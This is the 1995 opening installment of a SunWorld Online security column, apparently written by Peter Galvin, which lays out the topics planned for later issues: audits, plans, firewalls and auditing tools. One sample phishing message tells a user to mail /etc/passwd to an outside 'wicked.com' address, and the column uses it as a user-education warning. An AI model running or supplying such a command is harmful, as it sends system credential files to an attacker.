Pete's Wicked World July 1995 The world can be a wicked place. This column will help you survive.

July  1995

The security of your computer systems should not be taken lightly. Armed with vigilance, common sense, and Peter Galvin's ageless wisdom, you will be able to tailor the security of your site to meet the needs of users and managers alike. Included at the end is a questionnaire focused on the security information needs of readers.

Mail this article to a friend

Welcome to Pete's Wicked World! It's a world full of problems, security problems. It's a world that constantly changes, and unfortunately, this means you must keep abreast of the latest technology or be left behind. What new net-denizen may bite you? What new tool can be used maliciously when in the wrong hands? And what techniques can you employ to make your world a better place?

In the columns to follow, I intend to address the entire realm of computer security. The need is great for information about how systems can be broken into; it's even greater for ways to prevent such break-ins. If your site is connected to the Internet, or some other widely-accessible network, chances are you already know some of the dangers to which you are exposed.

What about those of you feeling safe behind a firewall or residing on a disconnected network? Consider a disgruntled employee, or someone gaining access through your modem pool, or someone gaining physical access. Industrial espionage happens: the unwitting delete files; junior James Bonds spy on each other; and the greedy exchange data for dollars.

Security should be the concern of every system administrator. In fact it should be of concern to every user, as well as everyone in the information management chain at your site.

Oh, it's you, Bob!
Let's visit Bob, an end-user at your site. What would Bob do if he received a message like this?

Hi Bob, I'm doing a survey of computer accounts and user names. Can you send me a copy of the password file? Simply issue the command cat /etc/passwd | mail me@wicked.com. Thanks!

Would your users know what to do with this message? Do you or does your management have education systems in place to inform users about what is important on your systems and how to protect it? The Chief Technology Officer needs to understand security before an incident occurs so rational choices can be made between system security and convenient use.

So, are your systems safe? How do you even define "safe"? Who could be trying to gain access to your systems? What can they do on your systems? What can you do to stop them? These are the issues in Pete's Wicked World.

The World
The world we'll explore together includes some interesting terrain.

• Security Audits. To know where you're going, you need to know where you are. How do you determine the security state of your systems, network, and user accounts? Have your systems already been penetrated? An audit gives you a baseline to work from.
• Security Plan. After you know where you are, you need to plan your trip. This requires determining, either formally or informally, the level of security you want to achieve. The plan can even be "maintain the status quo," but after auditing your systems that's not likely to be the case. Perhaps you'll decide to educate users, close known security holes, install a firewall, or revamp the entire installation. A plan is the first step in this direction.
• Security Instruments. With a plan in place, the next step is to determine what tools, methods, policies, and equipment you need to implement the plan. Because of the importance of this area, we'll spend a lot of time exploring it.

  We'll consider the types of firewalls, proxy and filtering, and the variety of implementations: Firewall-1, Janus, TIS, and Netgate.

  Security auditing tools, such as ASET, COPS, and SATAN, will come up in our discussions, as well as intrusion-detection and prevention software like Tripwire, tcp_wrapper, and crack.

  Remote-authentication tools such as s/key and cryptography smart-cards, will require a look, too.

• Timely information. The world is always changing. New bugs are discovered that affect system security. New products both help and hinder you in your job. Books, articles, and white papers are numerous. Tools are made publicly available, for better or worse. How do you keep up with it all? Our hope is that you'll look to this column first, both for the timeliness of its contents and its straightforward analysis of what's out there, what you need to care about, and how it can effect your job, life, and interests.

If something extraordinary occurs between issues, expect to read about it here quickly as a news update. We aren't wed to deadlines, production schedules, and press runs. We'll try to inform you about timely issues in a, well, timely fashion.

The Medium and the Message
Pete's Wicked World is the first professional security column (that we know of) available exclusively on the web. We intend to make use of the immediacy of this medium to make the column more useful to you. You'll be able to download code fragments and even whole programs at the click of a button. If there's an interesting whitepaper tucked away at an ftp site somewhere, you'll get a live pointer to it. Even news groups, mailing lists, and FAQs won't be immune to our efforts to make a variety of interesting security resources available from one place.

How often have you remembered reading an important article or review, and not remembered where or when you saw it? How useful would it be to have all issues of a magazine available to you at the click of a button? SunWorld Online thinks this is important and will work hard to be sure it happens. A steadily growing index of previous columns and issues will be one of many entry points into this forum.

You Rang?
Let us know what you think of Pete's Wicked World. All writers make assumptions, raise controversial issues, and state opinions. It has never been easier to challenge these assumptions, argue about controversies, and state your own opinions. We'd like to hear from you about the format as well as the content of SunWorld Online, and Pete's Wicked World, of course. You can contact me as peter.galvin@sunworld.com. The World is a kinder and more gentle place for readers. Please send suggestions, tips, information about topics you'd be interested in. If we use something from you, we'll be glad to cite you. Send a pointer to your home page along, if you have one!

We hope this column, and this magazine, will be a success. It won't be a success by having us write at you. That's been done before. It will be a success if it's interactive, led and fed by you, our readers. If something is important to you we can address it, and we can do so rapidly.

So what is important to you? Need a pointer to the book on a topic, information about a product, evaluation of a happening? Let's get the bits flowing, in two directions, and enjoy the new power at our fingertips.

Next Month, on "As Pete's Wicked World Turns"
First things first, so the main thrust of next month's column will be the security audit. The major pieces you need to conduct such an audit are a plan, tools, and knowledge. The plan roughs-out what system or systems will be audited, why it's important to audit that system, how the audit will be done and what will happen with the results. The tools will conduct the audit. Knowledge is needed to analyze the results, interpret them in terms of the plan, draw conclusions, and determine the next step.

Also next month, we'll start the canonical security reading list, provide pointers to important security resources on the network, and will start the security-bug-of-the-month club. Stay tuned!

Security Survey
Fill out this survey devoted to your security information needs.

About the author
Peter Galvin is currently the Systems Manager for Brown University's Computer Science Department, where he provides technical management of an installation of nearly 200 SPARCstations and servers. He is also a member of the Board of Directors of the Sun User Group, and has been Program Chair for the last four SUG/SunWorld conferences. As a consultant and trainer, he has given talks and tutorials world-wide. He has written articles for Byte and Advanced Systems (SunWorld) magazines, and the Superuser newsletter. Peter is coauthor of the best-selling Operating Systems Concepts textbook. Reach Peter at peter.galvin@sunworld.com.

If you have technical problems with this magazine, contact webmaster@sunworld.com

URL: http://www.sunworld.com/swol-07-1995/swol-07-security.html
Last modified: